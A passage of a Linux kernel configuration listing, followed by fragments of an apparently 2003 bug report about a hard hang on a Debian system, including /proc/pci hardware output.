not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_NCR53C7xx is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_NCR53C8XX is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_SEAGATE is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # CONFIG_IEEE1394=y # # Subsystem Options # # CONFIG_IEEE1394_VERBOSEDEBUG is not set # CONFIG_IEEE1394_OUI_DB is not set # # Device Drivers # # CONFIG_IEEE1394_PCILYNX is not set CONFIG_IEEE1394_OHCI1394=y # # Protocol Drivers # # CONFIG_IEEE1394_VIDEO1394 is not set CONFIG_IEEE1394_SBP2=m # CONFIG_IEEE1394_SBP2_PHYS_DMA is not set # CONFIG_IEEE1394_ETH1394 is not set # CONFIG_IEEE1394_DV1394 is not set CONFIG_IEEE1394_RAWIO=y CONFIG_IEEE1394_CMP=y # CONFIG_IEEE1394_AMDTP is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=m CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=m CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_NAT=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_TOS=y CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m CONFIG_NET_IPGRE_BROADCAST=y CONFIG_IP_MROUTE=y CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_UNCLEAN=m CONFIG_IP_NF_MATCH_OWNER=m # CONFIG_IP_NF_MATCH_PHYSDEV is not set CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_MIRROR=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m CONFIG_IP_NF_NAT_LOCAL=y CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_COMPAT_IPCHAINS=m CONFIG_IP_NF_COMPAT_IPFWADM=m CONFIG_IPV6=m # CONFIG_IPV6_PRIVACY is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set # CONFIG_INET6_IPCOMP is not set # CONFIG_IPV6_TUNNEL is not set # # IPv6: Netfilter Configuration # CONFIG_IP6_NF_QUEUE=m CONFIG_IP6_NF_IPTABLES=m CONFIG_IP6_NF_MATCH_LIMIT=m CONFIG_IP6_NF_MATCH_MAC=m # CONFIG_IP6_NF_MATCH_RT is not set # CONFIG_IP6_NF_MATCH_OPTS is not set # CONFIG_IP6_NF_MATCH_FRAG is not set # CONFIG_IP6_NF_MATCH_HL is not set CONFIG_IP6_NF_MATCH_MULTIPORT=m CONFIG_IP6_NF_MATCH_OWNER=m CONFIG_IP6_NF_MATCH_MARK=m # CONFIG_IP6_NF_MATCH_IPV6HEADER is not set # CONFIG_IP6_NF_MATCH_AHESP is not set CONFIG_IP6_NF_MATCH_LENGTH=m CONFIG_IP6_NF_MATCH_EUI64=m CONFIG_IP6_NF_FILTER=m CONFIG_IP6_NF_TARGET_LOG=m CONFIG_IP6_NF_MANGLE=m CONFIG_IP6_NF_TARGET_MARK=m # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=m # CONFIG_IP_SCTP is not set CONFIG_ATM=y CONFIG_ATM_CLIP=y # CONFIG_ATM_CLIP_NO_ICMP is not set CONFIG_ATM_LANE=m CONFIG_ATM_MPOA=m CONFIG_ATM_BR2684=m CONFIG_ATM_BR2684_IPFILTER=y # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set CONFIG_BRIDGE=m # CONFIG_BRIDGE_NF_EBTABLES is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_EQUALIZER=m CONFIG_TUN=m # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set # CONFIG_EL3 is not set # CONFIG_3C515 is not set CONFIG_VORTEX=y # CONFIG_TYPHOON is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_AT1700 is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set # CONFIG_NET_ISA is not set # CONFIG_NET_PCI is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # CONFIG_ACENIC=m # CONFIG_ACENIC_OMIT_TIGON_I is not set CONFIG_DL2K=m CONFIG_E1000=m # CONFIG_E1000_NAPI is not set CONFIG_NS83820=m CONFIG_HAMACHI=m CONFIG_YELLOWFIN=m CONFIG_R8169=m CONFIG_SK98LIN=m CONFIG_TIGON3=m # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set CONFIG_FDDI=y CONFIG_DEFXX=m CONFIG_SKFP=m # CONFIG_HIPPI is not set CONFIG_PLIP=m CONFIG_PPP=m CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPPOE=m CONFIG_PPPOATM=m CONFIG_SLIP=m CONFIG_SLIP_COMPRESSED=y CONFIG_SLIP_SMART=y CONFIG_SLIP_MODE_SLIP6=y # # Wireless LAN (non-hamradio) # CONFIG_NET_RADIO=y # # Obsolete Wireless cards support (pre-802.11) # CONFIG_STRIP=m CONFIG_ARLAN=m CONFIG_WAVELAN=m # # Wireless 802.11b ISA/PCI cards support # CONFIG_AIRO=m CONFIG_HERMES=m CONFIG_PLX_HERMES=m # CONFIG_TMD_HERMES is not set CONFIG_PCI_HERMES=m CONFIG_NET_WIRELESS=y # # Token Ring devices (depends on LLC=y) # CONFIG_NET_FC=y CONFIG_IPHASE5526=m CONFIG_RCPCI=m CONFIG_SHAPER=m # # Wan interfaces # CONFIG_WAN=y CONFIG_HOSTESS_SV11=m CONFIG_COSA=m # CONFIG_COMX is not set # CONFIG_DSCC4 is not set # CONFIG_LANMEDIA is not set CONFIG_SEALEVEL_4021=m # CONFIG_SYNCLINK_SYNCPPP is not set CONFIG_HDLC=m CONFIG_HDLC_RAW=y # CONFIG_HDLC_RAW_ETH is not set CONFIG_HDLC_CISCO=y CONFIG_HDLC_FR=y CONFIG_HDLC_PPP=y # # X.25/LAPB support is disabled # # CONFIG_PC300 is not set CONFIG_N2=m CONFIG_C101=m CONFIG_FARSYNC=m # CONFIG_HDLC_DEBUG_PKT is not set # CONFIG_HDLC_DEBUG_HARD_HEADER is not set # CONFIG_HDLC_DEBUG_ECN is not set # CONFIG_HDLC_DEBUG_RINGS is not set CONFIG_DLCI=m CONFIG_DLCI_COUNT=24 CONFIG_DLCI_MAX=8 CONFIG_SDLA=m CONFIG_SBNI=m CONFIG_SBNI_MULTILINE=y # # ATM drivers # CONFIG_ATM_TCP=m CONFIG_ATM_LANAI=m CONFIG_ATM_ENI=m # CONFIG_ATM_ENI_DEBUG is not set # CONFIG_ATM_ENI_TUNE_BURST is not set CONFIG_ATM_FIRESTREAM=m CONFIG_ATM_ZATM=m # CONFIG_ATM_ZATM_DEBUG is not set CONFIG_ATM_ZATM_EXACT_TS=y CONFIG_ATM_NICSTAR=m CONFIG_ATM_NICSTAR_USE_SUNI=y CONFIG_ATM_NICSTAR_USE_IDT77105=y CONFIG_ATM_IDT77252=m # CONFIG_ATM_IDT77252_DEBUG is not set # CONFIG_ATM_IDT77252_RCV_ALL is not set CONFIG_ATM_IDT77252_USE_SUNI=y CONFIG_ATM_AMBASSADOR=m # CONFIG_ATM_AMBASSADOR_DEBUG is not set CONFIG_ATM_HORIZON=m # CONFIG_ATM_HORIZON_DEBUG is not set CONFIG_ATM_IA=m # CONFIG_ATM_IA_DEBUG is not set CONFIG_ATM_FORE200E_MAYBE=m CONFIG_ATM_FORE200E_PCA=y CONFIG_ATM_FORE200E_PCA_DEFAULT_FW=y CONFIG_ATM_FORE200E_TX_RETRY=16 CONFIG_ATM_FORE200E_DEBUG=0 CONFIG_ATM_FORE200E=m # CONFIG_ATM_HE is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=m # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=m CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=m # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=m CONFIG_SERIAL_8250_EXTENDED=y # CONFIG_SERIAL_8250_MANY_PORTS is not set CONFIG_SERIAL_8250_SHARE_IRQ=y # CONFIG_SERIAL_8250_DETECT_IRQ is not set # CONFIG_SERIAL_8250_MULTIPORT is not set # CONFIG_SERIAL_8250_RSA is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=m CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m CONFIG_TIPAR=m # # I2C support # CONFIG_I2C=y CONFIG_I2C_ALGOBIT=m # CONFIG_I2C_PHILIPSPAR is not set # CONFIG_I2C_ELV is not set # CONFIG_I2C_VELLEMAN is not set CONFIG_SCx200_ACB=y CONFIG_I2C_ALGOPCF=m # CONFIG_I2C_ELEKTOR is not set CONFIG_I2C_CHARDEV=m # # I2C Hardware Sensors Mainboard support # # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set CONFIG_I2C_ISA=y # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_SIS96X is not set CONFIG_I2C_VIAPRO=y # # I2C Hardware Sensors Chip support # CONFIG_SENSORS_ADM1021=m # CONFIG_SENSORS_IT87 is not set CONFIG_SENSORS_LM75=y # CONFIG_SENSORS_LM85 is not set CONFIG_SENSORS_VIA686A=m CONFIG_SENSORS_W83781D=m CONFIG_I2C_SENSOR=y # # Mice # # CONFIG_BUSMOUSE is not set CONFIG_QIC02_TAPE=m CONFIG_QIC02_DYNCONF=y # # Setting runtime QIC-02 configuration is done with qic02conf # # # from the tpqic02-support package. It is available at # # # metalab.unc.edu or ftp://titus.cfw.com/pub/Linux/util/ # # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set CONFIG_NVRAM=m CONFIG_RTC=m # CONFIG_GEN_RTC is not set CONFIG_DTLK=m CONFIG_R3964=m CONFIG_APPLICOM=m CONFIG_SONYPI=m # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=m CONFIG_AGP_ALI=m CONFIG_AGP_AMD=m # CONFIG_AGP_AMD_8151 is not set CONFIG_AGP_INTEL=m # CONFIG_AGP_NVIDIA is not set CONFIG_AGP_SIS=m CONFIG_AGP_SWORKS=m CONFIG_AGP_VIA=m CONFIG_DRM=y CONFIG_DRM_TDFX=m CONFIG_DRM_GAMMA=m CONFIG_DRM_R128=m CONFIG_DRM_RADEON=m CONFIG_DRM_I810=m CONFIG_DRM_I830=m CONFIG_DRM_MGA=m CONFIG_MWAVE=m # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set # CONFIG_EXT3_FS is not set # CONFIG_JBD is not set CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set CONFIG_REISERFS_PROC_INFO=y # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_QUOTA=y # CONFIG_QFMT_V1 is not set CONFIG_QFMT_V2=y CONFIG_QUOTACTL=y # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=m # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y # CONFIG_DEVFS_MOUNT is not set # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_EXPORTFS is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=m # # Graphics support # CONFIG_FB=y # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set CONFIG_FB_RIVA=y # CONFIG_FB_I810 is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_RTCTIMER is not set # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_DUMMY=m CONFIG_SND_VIRMIDI=m # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # ISA devices # # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set CONFIG_SND_CMIPCI=y # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set CONFIG_USB_STORAGE_FREECOM=y # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # CONFIG_USB_TIGL=y # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_SPEE</t>
  </si>
  <si>
    <t>Hard hang after a few days of uptime.</t>
  </si>
  <si>
    <t>2003-06-17 04:30 UTC</t>
  </si>
  <si>
    <t>Steven Fuerst</t>
  </si>
  <si>
    <t>2003-08-31 16:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: $ cat /proc/pci PCI devices found: Bus 0, device 0, function 0: Host bridge: VIA Technologies, In VT8366/A/7 [Apollo K (rev 0). Prefetchable 32 bit memory at 0xd0000000 [0xd7ffffff]. Bus 0, device 1, function 0: PCI bridge: VIA Technologies, In VT8366/A/7 [Apollo K (rev 0). Master Capable. No bursts. Min Gnt=12. Bus 0, device 8, function 0: Multimedia video controller: PCI device 4444:0803 (Internext Compressio) (re v 1). IRQ 19. Master Capable. Latency=32. Min Gnt=128.Max Lat=8. Prefetchable 32 bit memory at 0xd8000000 [0xdbffffff]. Bus 0, device 9, function 0: Multimedia audio controller: Ensoniq 5880 AudioPCI (rev 2). IRQ 18. Master Capable. Latency=32. Min Gnt=12.Max Lat=128. I/O at 0xc000 [0xc03f]. Bus 0, device 13, function 0: Ethernet controller: Accton Technology Co SMC2-1211TX (rev 16). IRQ 17. Master Capable. Latency=32. Min Gnt=32.Max Lat=64. I/O at 0xc400 [0xc4ff]. Non-prefetchable 32 bit memory at 0xe2000000 [0xe20000ff]. Bus 0, device 17, function 0: ISA bridge: VIA Technologies, In VT8233A ISA Bridge (rev 0). Bus 0, device 17, function 1: IDE interface: VIA Technologies, In VT82C586/B/686A/B PI (rev 6). IRQ 11. Master Capable. Latency=32. I/O at 0xc800 [0xc80f]. Bus 0, device 17, function 2: USB Controller: VIA Technologies, In USB (rev 35). IRQ 21. Master Capable. Latency=32. I/O at 0xcc00 [0xcc1f]. Bus 0, device 17, function 3: USB Controller: VIA Technologies, In USB (#2) (rev 35). IRQ 21. Master Capable. Latency=32. I/O at 0xd000 [0xd01f]. Bus 0, device 19, function 0: RAID bus controller: Triones Technologies HPT366/368/370/370A/ (rev 5). IRQ 18. Master Capable. Latency=120. Min Gnt=8.Max Lat=8. I/O at 0xd400 [0xd407]. I/O at 0xd800 [0xd803]. I/O at 0xdc00 [0xdc07]. I/O at 0xe000 [0xe003]. I/O at 0xe400 [0xe4ff]. Bus 1, device 0, function 0: VGA compatible controller: Matrox Graphics, Inc MGA G400 AGP (rev 130). IRQ 16. Master Capable. Latency=64. Min Gnt=16.Max Lat=32. Prefetchable 32 bit memory at 